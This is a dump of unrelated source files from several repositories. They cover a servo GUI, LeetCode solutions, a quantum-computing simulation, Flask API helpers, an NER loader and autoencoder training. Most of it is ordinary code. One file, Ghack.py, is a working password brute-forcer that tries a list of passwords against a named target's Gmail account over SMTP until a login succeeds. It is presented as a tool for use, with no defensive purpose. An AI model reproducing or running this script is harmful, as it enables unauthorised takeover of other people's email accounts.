#Returns list of dictionaries that contained registered device information
def retrieve_regDevices():
regDevices = []
#Establish DB Connection
connection = MongoClient(config.mongoURI)
# Retrieve names of all databases
dbNames = connection.list_database_names()
if 'netmap' in dbNames:
#Set up DB for NetMap Devices
netmapDB = connection["netmap"]
netmapCollection = netmapDB["netmaps"]
#Retrieve all registered devices
devices = netmapCollection.find()
#Generate list of registered devices
for device in devices:
regDevices.append(device)
#Export the list of dictonaries
return regDevices
| [
"Gr3yG00se@protonmail.com"
] | Gr3yG00se@protonmail.com |
f1526f327e2c49c3286b1241e61d0b56db652768 | cf2daa38a23dbab72d9538a5b12b5a32a6f43cd3 | /ultra_gui.py | be3b1b7853096f3369aa4632df39de8237625ebb | [
"Apache-2.0"
] | permissive | barum-jam-collective/PiWars2021-General | 2d7b54773e0995e0b2e6856b3d0c3ca849758de0 | 5edbc706332c942309ee6922dd11342b8ae0c290 | refs/heads/main | 2023-05-08T19:56:29.080659 | 2021-05-23T16:44:14 | 2021-05-23T16:44:14 | 337,853,444 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,727 | py | # Python GUI for Servo control
# Specifically written for and in lieu of PiBorg's vesion for the UltraBorg Servo and Sensor Board
# This is a small program for testing PiBorgs UltrabBorg Servo and Ultrasonic Sensor board.
# When run it creates a GUI with 4 sliders that can be used to operate Servos connected to the UltraBorg.
# There is currently no code to test Ultrasonic Senors
# 10 Feb 2021
#import libraries
import UltraBorg3 as UltraBorg
from guizero import App, Box, Slider, Text, TextBox, PushButton
# Start the UltraBorg
global UB
UB = UltraBorg.UltraBorg()
UB.Init()
def set_initial_servo_positions():
# To read the saved servo positiona and set the slider start position?
slider1_value = UB.GetServoPosition1()
slider2_value = UB.GetServoPosition2()
slider3_value = UB.GetServoPosition3()
slider4_value = UB.GetServoPosition4()
UB.SetServoPosition1(float(slider1_value) / 100.0)
UB.SetServoPosition2(float(slider1_value) / 100.0)
UB.SetServoPosition3(float(slider1_value) / 100.0)
UB.SetServoPosition4(float(slider1_value) / 100.0)
# Print the servo positions to the sccreen
print("Servo 1 = ",slider1_value)
print("Servo 2 = ",slider2_value)
print("Servo 3 = ",slider3_value)
print("Servo 4 = ",slider4_value)
def slider1_changed(slider1_value):
global UB
textbox1.value = UB.GetServoPosition1() #retrieves the servo position and displays it in the box below the slider
UB.SetServoPosition1(float(slider1_value) / 90)
def slider2_changed(slider2_value):
global UB
textbox2.value = UB.GetServoPosition2() #retrieves the servo position and displays it in the box below the slider
UB.SetServoPosition2(float(slider2_value) / 90)
def slider3_changed(slider3_value):
global UB
textbox3.value = UB.GetServoPosition3() #retrieves the servo position and displays it in the box below the slider
UB.SetServoPosition3(float(slider3_value) / 90)
def slider4_changed(slider4_value):
global UB
textbox4.value = UB.GetServoPosition4() #retrieves the servo position and displays it in the box below the slider
UB.SetServoPosition4(float(slider4_value) / 90)
# Reset the servos
def reset_servo1():
UB.SetServoPosition1(float(0) / 90)
textbox1.value = UB.GetServoPosition1()
slider1.value="0"
def reset_servo2():
UB.SetServoPosition1(float(0) / 90)
textbox2.value = UB.GetServoPosition2()
slider2.value="0"
def reset_servo3():
UB.SetServoPosition3(float(0) / 90)
textbox1.value = UB.GetServoPosition3()
slider3.value="0"
def reset_servo4():
UB.SetServoPosition4(float(0) / 90)
textbox1.value = UB.GetServoPosition4()
slider4.value="0"
app = App(title="Servo Control") # Window Title
message = Text(app, text="UltraBorg Servo Control - Move the sliders to control servos") # Text to display inside window
set_initial_servo_positions() # Not sure if this is working
#create the sliders in the window and link to control functions
slider1 = Slider(app, command=slider1_changed, start=-90, end=90, width='fill')
textbox1 = TextBox(app)
button = PushButton(app, text="Reset", command=reset_servo1)
slider2= Slider(app, command=slider2_changed, start=-90, end=90, width='fill')
textbox2 = TextBox(app)
button = PushButton(app, text="Reset", command=reset_servo2)
slider3= Slider(app, command=slider3_changed, start=-90, end=90, width='fill')
textbox3 = TextBox(app)
button = PushButton(app, text="Reset", command=reset_servo3)
slider4= Slider(app, command=slider4_changed, start=-90, end=90, width='fill')
textbox4 = TextBox(app)
button = PushButton(app, text="Reset", command=reset_servo4)
#display everything
app.display()
| [
"noreply@github.com"
] | barum-jam-collective.noreply@github.com |
6c0c42ab44dab3984b93fc4dcd90b4953dd419fe | b7aba8b3e94d8a5261d6bfeb54deb25813d89f97 | /python/669_trim_a_binary_search_tree.py | 3dd9f2cf2ee7eb7f74269e45370da077884dd654 | [] | no_license | jianq1994/leetcode | 34cd88d567fe675a8a545c968f4994dfbb7af42b | d68b5ac6359a06e144fc6273978d91c5f73093f1 | refs/heads/master | 2022-02-23T03:07:45.532971 | 2019-08-19T20:46:19 | 2019-08-19T20:46:19 | 123,503,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def trimBST(self, root: TreeNode, L: int, R: int) -> TreeNode:
if not root:
return root
if root.val < L:
return self.trimBST(root.right,L,R)
if root.val > R:
return self.trimBST(root.left,L,R)
root.left = self.trimBST(root.left,L,R)
root.right = self.trimBST(root.right,L,R)
return root | [
"jianq1994@gmail.com"
] | jianq1994@gmail.com |
5b219f9223b9bcb10fddba2b26b7ab668b8326f1 | de8917857bfce63eb293cf8047ae67484236d15b | /Grover/0000/algorithm.py | d0654c1efaff9614ea58562ea77510653e689ba5 | [] | no_license | mcasanova1445/transmon-thesis | 73f15bd02bc5f6ecede6b8664e337993ac162931 | e4a4890c7b666debf6824306ab3f131575fef997 | refs/heads/master | 2020-03-09T00:06:30.327912 | 2019-02-15T17:18:11 | 2019-02-15T17:18:11 | 128,480,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,300 | py | # PageRank del grafo corona
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
from scipy.stats import norm
from qutip import *
import tgates
import time
def Htrans(psi0):
res = tgates.H(psi0, 0)
res = tgates.H(res.states[-1], 1)
res = tgates.H(res.states[-1], 2)
return tgates.H(res.states[-1], 3)
def Us(psi0):
res = Htrans(psi0)
res = tgates.CCCP(res.states[-1], 1, 2, 3, 0, np.pi, b = 0b00)
return Htrans(res.states[-1])
def Uomega(psi0):
return tgates.CCCP(psi0, 0, 1, 2, 3, np.pi, b = 0b00)
'''
def Uomega(psi0):
return tgates.CCP(psi0, 0, 3, 2, np.pi, b = 0b10)
'''
'''
def Uomega(psi0):
return tgates.CP(psi0, 2, 1, np.pi, b = 0b01)
'''
qN = 2**4
# El algoritmo
# Estado fiducial
print('{}/{}/{} - {}:{}:{}\t Preparando estado fiducial...'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5]))
psi0 = tensor(basis(2,0), basis(2,0), basis(2,0), basis(2,0))
# Preparación del estado inicial
print('{}/{}/{} - {}:{}:{}\t Preparando estado inicial...'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5]))
res = Htrans(psi0)
Nit = 2*int(np.pi*np.sqrt(qN)/4)+1
for i in range(Nit):
print('{}/{}/{} - {}:{}:{}\t Iteración {}/{}: Aplicando Uomega...'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5], i+1, Nit))
res = Uomega(res.states[-1])
print('{}/{}/{} - {}:{}:{}\t Iteración {}/{}: Aplicando Us...'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5], i+1, Nit))
res = Us(res.states[-1])
print('{}/{}/{} - {}:{}:{}\t Iteración {}/{}: Guardando resultado de iteración...'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5], i+1, Nit))
qsave(res, 'it_{}'.format(i+1))
print('{}/{}/{} - {}:{}:{}\t Iteración {}/{}: Terminada'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5], i+1, Nit))
| [
"mcasanova1445@gmail.com"
] | mcasanova1445@gmail.com |
becccdb8da64a4c8fc094e6460056a3223cb42ea | f263cdf3c16a2880de4ac8de00dd77ecd27e8622 | /final_project/helpers.py | 79bf430becc319bdc65a49a67038a2c59180beb5 | [] | no_license | chasesliger/CS50_Intro | ff202b6f06924b509f6f49b9658d51112e5ffa15 | 56c3b72e19dbacb0f3f075bc8575f09765d91da6 | refs/heads/master | 2022-11-25T18:01:27.459680 | 2020-07-24T15:48:45 | 2020-07-24T15:48:45 | 270,345,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,263 | py | import os
import requests
import urllib.parse
import json
from flask import redirect, render_template, request, session
from functools import wraps
def apology(message, code=400):
"""Render message as an apology to user."""
def escape(s):
"""
Escape special characters.
https://github.com/jacebrowning/memegen#special-characters
"""
for old, new in [("-", "--"), (" ", "-"), ("_", "__"), ("?", "~q"),
("%", "~p"), ("#", "~h"), ("/", "~s"), ("\"", "''")]:
s = s.replace(old, new)
return s
return render_template("apology.html", top=code, bottom=escape(message)), code
def login_required(f):
"""
Decorate routes to require login.
http://flask.pocoo.org/docs/1.0/patterns/viewdecorators/
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if session.get("user_id") is None:
return redirect("/login")
return f(*args, **kwargs)
return decorated_function
def lookup_parks(state):
# get the NPS Key environmental variable, then try to send API request to National Park's website
try:
NPS_key = os.environ.get("NPS_KEY")
request = requests.get(f"https://developer.nps.gov/api/v1/parks?stateCode={state}&limit=100&fields=images&api_key={NPS_key}",)
request.raise_for_status()
except requests.RequestException:
return None
try:
# convert to json for processing
park_data = request.json()
data = park_data["data"]
# make a list to hold a dictionary for each park
parks = []
for row in data:
name = row["name"]
park_url = row["url"]
city = row["addresses"][0]["city"]
latitude = row["latitude"]
longitude = row["longitude"]
latlong = latitude +"," + longitude
# temporary dictionary to append to the parks list
temp_dict = {
"name": name,
"url": park_url,
"city": city,
"latlong": latlong
}
parks.append(temp_dict)
return parks
except (KeyError, TypeError, ValueError):
return None
def lookup_weather(lat,lon):
try:
# get the weather API key environmental variable, then try to make a request
Open_weather_key = os.environ.get("Open_weather_key")
request = requests.get(f"http://api.openweathermap.org/data/2.5/weather?lat={lat}&lon={lon}&units=imperial&appid={Open_weather_key}",)
request.raise_for_status()
except requests.RequestException:
return None
try:
# format the data into a dictionary for display on the HTML page
weather_data = request.json()
# format the data into a dictionary for display on the HTML page
data = {
"temp": str(weather_data['main']['temp']),
"feels_like":str(weather_data["main"]["feels_like"]),
"description": str(weather_data['weather'][0]["description"]),
"city": weather_data["name"],
"icon": weather_data['weather'][0]['icon']
}
return data
except (KeyError, TypeError, ValueError):
return None
| [
"noreply@github.com"
] | chasesliger.noreply@github.com |
7075283b6955bdfb1a33d515a731dcf20942c77d | cbfb679bd068a1153ed855f0db1a8b9e0d4bfd98 | /leet/google/trees_and_graphs/1466_Reorder_Routes_to_Make_All_Paths_Lead_to_the_City_Zero.py | b9d29f7cfe28380b2d2c1c3fe882319eb9cf1dfb | [] | no_license | arsamigullin/problem_solving_python | 47715858a394ba9298e04c11f2fe7f5ec0ee443a | 59f70dc4466e15df591ba285317e4a1fe808ed60 | refs/heads/master | 2023-03-04T01:13:51.280001 | 2023-02-27T18:20:56 | 2023-02-27T18:20:56 | 212,953,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | import collections
from leet.microsoft.trees_and_graphs.n_ary_tree_level_order_traversal import List
class SolutionMy:
def minReorder(self, n: int, connections: List[List[int]]) -> int:
graph = collections.defaultdict(list)
directedGraph = collections.defaultdict(set)
# we compose directed and udirected graphs
for u, v in connections:
graph[v].append(u)
graph[u].append(v)
directedGraph[u].add(v)
total = 0
# we do dfs and then reaching the end of the tree we get we check
# if parent node is in children of child node
def dfs(node, parent):
nonlocal total
for child in graph[node]:
if child == parent:
continue
dfs(child, node)
if parent != -1 and parent not in directedGraph[node]:
total += 1
dfs(0, -1)
return total
| [
"ar.smglln@gmail.com"
] | ar.smglln@gmail.com |
430bdd49a95d6b8b0dd30c7bc493d0e783feaecc | 00da73f35308b860ef9a3c6eb6cdaf8c89608f57 | /deps/requests/exceptions.py | be7eaed6b9cbfe71db625ce1da3fcb11d242380b | [
"MIT"
] | permissive | kylebebak/Requester | 32abf8a56ba0e9e42fdd25b13ce48d40a87f20e0 | 7f177bc417c45fd1792c6020543a4c6909e3ea21 | refs/heads/master | 2022-07-17T11:09:30.238568 | 2022-05-05T17:31:48 | 2022-05-05T17:38:56 | 89,746,594 | 333 | 16 | MIT | 2021-02-23T14:43:12 | 2017-04-28T21:37:08 | Python | UTF-8 | Python | false | false | 3,103 | py | # -*- coding: utf-8 -*-
"""
requests.exceptions
~~~~~~~~~~~~~~~~~~~
This module contains the set of Requests' exceptions.
"""
from urllib3.exceptions import HTTPError as BaseHTTPError
class RequestException(IOError):
"""There was an ambiguous exception that occurred while handling your
request.
"""
def __init__(self, *args, **kwargs):
"""Initialize RequestException with `request` and `response` objects."""
response = kwargs.pop('response', None)
self.response = response
self.request = kwargs.pop('request', None)
if (response is not None and not self.request and
hasattr(response, 'request')):
self.request = self.response.request
super(RequestException, self).__init__(*args, **kwargs)
class HTTPError(RequestException):
"""An HTTP error occurred."""
class ConnectionError(RequestException):
"""A Connection error occurred."""
class ProxyError(ConnectionError):
"""A proxy error occurred."""
class SSLError(ConnectionError):
"""An SSL error occurred."""
class Timeout(RequestException):
"""The request timed out.
Catching this error will catch both
:exc:`~requests.exceptions.ConnectTimeout` and
:exc:`~requests.exceptions.ReadTimeout` errors.
"""
class ConnectTimeout(ConnectionError, Timeout):
"""The request timed out while trying to connect to the remote server.
Requests that produced this error are safe to retry.
"""
class ReadTimeout(Timeout):
"""The server did not send any data in the allotted amount of time."""
class URLRequired(RequestException):
"""A valid URL is required to make a request."""
class TooManyRedirects(RequestException):
"""Too many redirects."""
class MissingSchema(RequestException, ValueError):
"""The URL schema (e.g. http or https) is missing."""
class InvalidSchema(RequestException, ValueError):
"""See defaults.py for valid schemas."""
class InvalidURL(RequestException, ValueError):
"""The URL provided was somehow invalid."""
class InvalidHeader(RequestException, ValueError):
"""The header value provided was somehow invalid."""
class ChunkedEncodingError(RequestException):
"""The server declared chunked encoding but sent an invalid chunk."""
class ContentDecodingError(RequestException, BaseHTTPError):
"""Failed to decode response content"""
class StreamConsumedError(RequestException, TypeError):
"""The content for this response was already consumed"""
class RetryError(RequestException):
"""Custom retries logic failed"""
class UnrewindableBodyError(RequestException):
"""Requests encountered an error when trying to rewind a body"""
# Warnings
class RequestsWarning(Warning):
"""Base warning for Requests."""
pass
class FileModeWarning(RequestsWarning, DeprecationWarning):
"""A file was opened in text mode, but Requests determined its binary length."""
pass
class RequestsDependencyWarning(RequestsWarning):
"""An imported dependency doesn't match the expected version range."""
pass
| [
"kylebebak@gmail.com"
] | kylebebak@gmail.com |
2ac6ed87775431ddcbc4b7fa558d78fe2d909b63 | 3a3f24adfd63ff35009c1983abd07ff457afc261 | /Ghack.py | 0b6b2a2d808cf969aac493c8f69f24bada03927c | [] | no_license | lukaakul005/ghack0274 | 62fafc7e5741e1e929fb2ff77250a22c6bb3c55d | 82eed35c1b516b13659a9b4d0760b7bf3ac8a390 | refs/heads/master | 2021-05-21T03:42:14.562557 | 2020-04-02T17:52:55 | 2020-04-02T17:52:55 | 252,527,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | import smtplib
import time
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
n = 0
user = input("Enter the target's email address: ")
passfile = input("Enter the password file name: ")
passfile = open(passfile, "r")
for password in passfile:
try:
smtpserver.login(user, password)
print ("[+] Password Found: %s" % password)
break;
except smtplib.SMTPAuthenticationError:
print(n + 1)
print("Incorect password: " + password)
n += 1
time.sleep(5)
#70hr for 50k passwords
| [
"noreply@github.com"
] | lukaakul005.noreply@github.com |
a4ea9a9741282126ca5996726e4d99dec6bded63 | a151410b77d4d7151376b6e0be15ad15e49b7c14 | /results/quantum-dots/two-dim-quantum-dots/ground-state/tdho_system.py | e95b015e657d035129035894ef61983434f9a441 | [] | no_license | Schoyen/master-thesis | d3b5b0cb20bf0d8b3fbf2cf70eec63d6484b21d7 | 5c599431d9a000d767372b05580312f223883220 | refs/heads/master | 2023-04-19T03:20:08.076633 | 2021-04-29T11:16:26 | 2021-04-29T11:16:26 | 140,681,415 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | import os
import numpy as np
from quantum_systems import TwoDimensionalHarmonicOscillator
from hartree_fock import RHF
from hartree_fock.mix import DIIS
os.environ["QS_CACHE_TDHO"] = "1"
def cache_large_system(*args, **kwargs):
tdho = TwoDimensionalHarmonicOscillator(*args, **kwargs)
tdho.setup_system(verbose=True, add_spin=False, anti_symmetrize=False)
return tdho
def get_tdho(*args, add_spin=True, **kwargs):
tdho = TwoDimensionalHarmonicOscillator(*args, **kwargs)
tdho.setup_system(verbose=True, add_spin=add_spin)
return tdho
def get_rhf_tdho(*args, tol=1e-7, **kwargs):
tdho = cache_large_system(*args, **kwargs)
rhf = RHF(tdho, verbose=True, mixer=DIIS)
rhf.compute_ground_state(change_system_basis=True, tol=tol)
return rhf
| [
"oyvindschoyen@gmail.com"
] | oyvindschoyen@gmail.com |
a3aadbb6552e2b1f21e9e6b8b2892f95137b8f56 | f1d3393e741bb6bc1d0bec56b8466116d91206d8 | /NER-action/data_loader.py | ca0dd52b79aa68fe2903d1ca9ab7fafe7e758f56 | [] | no_license | wanghr873/NER- | 185d58bac94e800bd755ee4942887e792b646de2 | f88599fd7e01ad2303d8b44a32765e6bc61e310d | refs/heads/master | 2022-11-08T09:41:38.231942 | 2020-06-26T01:25:01 | 2020-06-26T01:25:01 | 275,047,971 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,038 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
#微信公众号 AI壹号堂 欢迎关注
#Author bruce
import codecs
import data_utils
def load_sentences(path):
"""
加载数据集,每一行至少包含一个汉字和一个标记
句子和句子之间是以空格进行分割
最后返回句子集合
:param path:
:return:
"""
# 存放数据集
sentences = []
# 临时存放每一个句子
sentence = []
for line in codecs.open(path, 'r', encoding='utf-8'):
# 去掉两边空格
line = line.strip()
# 首先判断是不是空,如果是则表示句子和句子之间的分割点
if not line:
if len(sentence) > 0:
sentences.append(sentence)
# 清空sentence表示一句话完结
sentence = []
else:
if line[0] == " ":
continue
else:
word = line.split()
assert len(word) >= 2
sentence.append(word)
# 循环走完,要判断一下,防止最后一个句子没有进入到句子集合中
if len(sentence) > 0:
sentences.append(sentence)
return sentences
def update_tag_scheme(sentences, tag_scheme):
"""
更新为指定编码
:param sentences:
:param tag_scheme:
:return:
"""
for i, s in enumerate(sentences):
tags = [w[-1] for w in s]
if not data_utils.check_bio(tags):
s_str = "\n".join(" ".join(w) for w in s)
raise Exception("输入的句子应为BIO编码,请检查输入句子%i:\n%s" % (i, s_str))
if tag_scheme == "BIO":
for word, new_tag in zip(s, tags):
word[-1] = new_tag
if tag_scheme == "BIOES":
new_tags = data_utils.bio_to_bioes(tags)
for word, new_tag in zip(s, new_tags):
word[-1] = new_tag
else:
raise Exception("非法目标编码")
#
# def word_mapping(sentences):
# """
# 构建字典
# :param sentences:
# :return:
# """
# word_list = [[x[0] for x in s] for s in sentences]
# dico = data_utils.create_dico(word_list)
# dico['<PAD>'] = 10000001
# dico['<UNK>'] = 10000000
# word_to_id, id_to_word = data_utils.create_mapping(dico)
# return dico, word_to_id, id_to_word
#
# def tag_mapping(sentences):
# """
# 构建标签字典
# :param sentences:
# :return:
# """
# tag_list = [[x[1] for x in s] for s in sentences]
# dico = data_utils.create_dico(tag_list)
# tag_to_id, id_to_tag = data_utils.create_mapping(dico)
# return dico, tag_to_id, id_to_tag
#
# def prepare_dataset(sentences, word_to_id, tag_to_id, train=True):
# """
# 数据预处理,返回list其实包含
# -word_list
# -word_id_list
# -word char indexs
# -tag_id_list
# :param sentences:
# :param word_to_id:
# :param tag_to_id:
# :param train:
# :return:
# """
# none_index = tag_to_id['O']
#
# data = []
# for s in sentences:
# word_list = [ w[0] for w in s]
# word_id_list = [word_to_id[w if w in word_to_id else '<UNK>'] for w in word_list]
# segs = data_utils.get_seg_features("".join(word_list))
# if train:
# tag_id_list = [tag_to_id[w[-1]] for w in s]
# else:
# tag_id_list = [none_index for w in s]
# data.append([word_list, word_id_list, segs,tag_id_list])
#
# return data
if __name__ == "__main__":
path = "data/ner.dev"
sentences = load_sentences(path)
print('load_sentences')
# update_tag_scheme(sentences,"BIOES")
# _, word_to_id, id_to_word = word_mapping(sentences)
# _, tag_to_id, id_to_tag = tag_mapping(sentences)
# dev_data = prepare_dataset(sentences, word_to_id, tag_to_id)
# data_utils.BatchManager(dev_data, 120)
| [
"noreply@github.com"
] | wanghr873.noreply@github.com |
25e3c77c55c822ccaa6161f2c5af8d82a68c33dd | a5d51c2dc35b6fbbff74707be2d446d25f337227 | /Pytorch/RDA/RDA.py | aad6c9f62bbbd8f23c7990e4dd85334d4603998d | [] | no_license | huiminren/RobustVAE | 5ed8223748be333374070cfb5172bfbcd1250991 | e82a33f6d4f03b2e3c7f176fbf6f05ce6524d0cd | refs/heads/master | 2023-05-23T01:13:48.950054 | 2021-06-07T01:20:10 | 2021-06-07T01:20:10 | 161,849,001 | 11 | 3 | null | null | null | null | UTF-8 | Python | false | false | 8,261 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 25 13:45:45 2019
@author: huiminren
"""
import torch
import torch.utils.data as Data
from torchvision.utils import save_image
from torch import nn
import matplotlib.pyplot as plt
import numpy as np
import os
import time
from BasicAutoencoder.DA import AE_Net as AENET
from BasicAutoencoder.DA import Autoencoder
from BasicAutoencoder.VAE import VAE_Net
from BasicAutoencoder.VAE import Autoencoder2
from shrink import l1shrink as SHR
import glob
from skimage.util import random_noise
from utils import *
def corrupt(X_in,corNum=10):
X = X_in.clone()
N,p = X.shape[0],X.shape[1]
for i in range(N):
loclist = np.random.randint(0, p, size = corNum)
for j in loclist:
if X[i,j] > 0.5:
X[i,j] = 0
else:
X[i,j] = 1
return X
class RobustDAE(object):
"""
@Original author: Chong Zhou
Des:
X = L + S
L is a non-linearly low rank matrix and S is a sparse matrix.
argmin ||L - Decoder(Encoder(L))|| + ||S||_1
Use Alternating projection to train model
"""
def __init__(self,lambda_=1.0,error = 1e-7,use_cuda=True, nz=100, ngf=64, ndf=64, nc=3):
self.errors = []
self.error = error
self.lambda_ = lambda_
self.ae = Autoencoder()
cuda = use_cuda and torch.cuda.is_available()
self.device = torch.device("cuda" if cuda else "cpu") #asign cuda
self.dae = AENET(nc, ngf, ndf, nz)
if torch.cuda.device_count() > 1: # if have multiple GPUs, set data parallel to model
print("Let's use", torch.cuda.device_count(), "GPUs!")
self.dae = nn.DataParallel(self.dae)
self.dae.to(self.device)
return
def fit(self,train_dataset, path, model_name, iteration = 30, batch_size = 128,
learning_rate = 1e-4, epochs = 20, verbose=False):
# Initialize L, S dtyp: tensor
X = train_dataset.tensors[0]
self.L = torch.zeros(X.size())
self.S = torch.zeros(X.size())
# Calculate mu(shrinkage operator)
X_numpy = X.detach().cpu().numpy()
# mu = (X_numpy.size)/(4.0*np.linalg.norm(X_numpy,1))
mu = (X_numpy.size)/(4.0*np.linalg.norm(X_numpy.reshape(-1,X_numpy.shape[-1]*X_numpy.shape[-1]),1))
print("Shrink parameter:", self.lambda_/mu)
LS0 = self.L + self.S
XFnorm = torch.norm(X,'fro') # Frobenius norm
if verbose:
print("X shape:",X.shape)
print("mu:",mu)
print("XFnorm:", XFnorm)
for it in range (iteration):
print('iteration:',it)
if verbose:
print("Out iteration:", it)
self.L = X - self.S
# Convert L to trian_loader
ae_dataset = Data.TensorDataset(self.L)
ae_train_loader = Data.DataLoader(dataset = ae_dataset, batch_size = batch_size, shuffle = True)
# Use L to train autoencoder and get optimized(reconstructed) L
model = self.ae.train(device = self.device, model = self.dae,
train_loader = ae_train_loader, learning_rate = learning_rate,epochs = epochs)
recon_loader = Data.DataLoader(dataset = ae_dataset,batch_size = 1, shuffle = False)
self.L = self.ae.reconstruction(self.device, model, recon_loader).detach().cpu()
# Alternate project of S
self.S = SHR.shrink(self.lambda_/mu,(X-self.L).reshape(-1)).reshape(X.shape)
# Break criterion 1: L and S are close enought to X
c1 = torch.norm((X - self.L - self.S),'fro') / XFnorm
# Break criterion 2: there is no change for L and S
c2 = np.min([mu,np.sqrt(mu)]) * torch.norm(LS0 - self.L - self.S) / XFnorm
self.errors.append(c1)
if it == iteration - 1:
print("save autoencoder:")
torch.save(model.state_dict(), path+'model_rda_'+model_name+'.pth')
# plots
print("plot examples of reconstruction:")
self.plot(path,X[:10],self.L[:10])
if verbose:
print("c1:",c1)
print("c2:",c2)
if c1 < self.error and c2 < self.error:
print("early break")
break
LS0 = self.L + self.S
return self.L
def plot(self,path,view_data,decoded_data):
save_image(view_data.data, path+'raw_face.jpg',nrow=10, padding=2)
save_image(decoded_data.data, path+'recon_face.jpg',nrow=10, padding=2)
# # initialize figure
# f, a = plt.subplots(2, 10, figsize=(5, 2)) #
# for i in range(10):
# a[0][i].imshow(np.transpose(view_data.data.numpy()[i],(1,2,0)))
# a[0][i].set_xticks(()); a[0][i].set_yticks(())
# a[1][i].clear()
# a[1][i].imshow(np.transpose(decoded_data.data.numpy()[i],(1,2,0)))
# a[1][i].set_xticks(()); a[1][i].set_yticks(())
# plt.savefig(path+"eg_recon.png")
# plt.show()
#===================================================
def main(lambda_, noise_factor, debug=True):
start_time = time.time()
torch.manual_seed(595)
ngf = 64
ndf = 64
nz = 100
nc = 3
learning_rate = 1e-4
batch_size = 128
iteration = 10
epochs = 20
vae_epochs = 200
if debug:
iteration = 1
epochs = 1
vae_epochs = 1
path = "rda/"
if not os.path.isdir(path):
os.mkdir(path)
if not os.path.exists(path):
os.mkdir(path)
path = path+"lambda_"+str(lambda_)+"/"
if not os.path.exists(path):
os.mkdir(path)
path = path+"noise_"+str(noise_factor)+"/"
if not os.path.exists(path):
os.mkdir(path)
data_files = glob.glob(os.path.join("./img_align_celeba", "*.jpg"))
data_files = sorted(data_files)
data_files = np.array(data_files)
x_train = np.array([get_image(data_file, 148) for data_file in data_files])
x_train_noisy = random_noise(x_train, mode='s&p', amount = noise_factor)
x_train_noisy = np.transpose(x_train_noisy,(0,3,1,2)).astype(np.float32)
x_train_noisy = torch.tensor(x_train_noisy)
train_dataset = Data.TensorDataset(x_train_noisy)
print("RDA denoising:")
rda = RobustDAE(lambda_ = lambda_, nz = nz, ngf = ngf, ndf = ndf, nc = nc)
L = rda.fit(train_dataset, path = path, model_name = str(noise_factor),
iteration = iteration, batch_size = batch_size,
learning_rate = learning_rate, epochs = epochs)
vae_dataset = Data.TensorDataset(L)
vae_loader = Data.DataLoader(vae_dataset, batch_size=128, shuffle=True,num_workers=2)
# load Neural Network
net = VAE_Net(nc, ngf, ndf, nz)
if torch.cuda.device_count() > 1: # if have multiple GPUs, set data parallel to model
print("Let's use", torch.cuda.device_count(), "GPUs!")
net = nn.DataParallel(net)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
net.to(device)
print("VAE generation:")
# train model
vae = Autoencoder2()
model = vae.train(device = device, model = net, train_loader = vae_loader,
learning_rate = learning_rate, epochs = vae_epochs)
# get reconstruction
recon_loader = Data.DataLoader(vae_dataset[:100], batch_size=1, shuffle=False,num_workers=2)
vae.reconstruction(device=device, model=model, dataloader=recon_loader)
# get generation
vae.generation_eg(device=device, model=model, path=path)
np.save(path+'running_time.npy',np.array(time.time()-start_time))
if __name__ == "__main__":
lambdas = [300]#[1, 10, 50, 70, 100, 150]
for lambda_ in lambdas:
noise_factors = [.2]#[.0, .05, .1, .15, .2, .25, .3, .35, .4, .45, .5]
for noise_factor in noise_factors:
print(noise_factor)
main(lambda_=lambda_, noise_factor = noise_factor, debug=True)
| [
"ramonarhm07@gmail.com"
] | ramonarhm07@gmail.com |
6c95a37e15e071cb1aa8402bc655919c7ec47651 | 2872f011134b482dbbddee2e04fcaf716b9d2241 | /spk_id/minivoxceleb/process.py | e845c1ee58e4ee9c2d184c7d70016c863868491b | [
"MIT"
] | permissive | jac002020/maso | 535d2543e2711629124df1371a22cce823b3855d | 0a721093684e19a0eeca268cd7953126c7b5a24e | refs/heads/master | 2022-03-29T12:55:56.789777 | 2019-11-19T15:37:50 | 2019-11-19T15:37:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | import os
import numpy as np
spkid = {}
utt2spk = {}
count = 0
for file in os.listdir("train"):
spk = file[:4]
if spk in spkid.keys():
utt2spk[file] = spkid[spk]
else:
spkid[spk] = count
utt2spk[file] = count
count += 1
for file in os.listdir("test"):
spk = file[:4]
if spk in spkid.keys():
utt2spk[file] = spkid[spk]
else:
spkid[spk] = count
utt2spk[file] = count
count += 1
print(spkid)
np.save("utt2spk.npy", utt2spk)
| [
"joshinh@gmail.com"
] | joshinh@gmail.com |
44d50c2a1e690a7070bc6b5edbee498c65bb711e | 2f07f8da841b991081dce5b81b78f462f5e75d21 | /chatbot/settings.py | 1503cd9a5d979480738a58cc804375f44773db7d | [] | no_license | antibagr/telegram-bot-template | 7a76bbb1ef083bfbceb17d87e40e02389ba46c88 | dce78f4476bd2a333d598bd055ff81d929d84bc5 | refs/heads/master | 2023-07-05T17:17:31.101438 | 2021-08-17T23:23:06 | 2021-08-17T23:23:06 | 396,156,088 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | from pathlib import Path
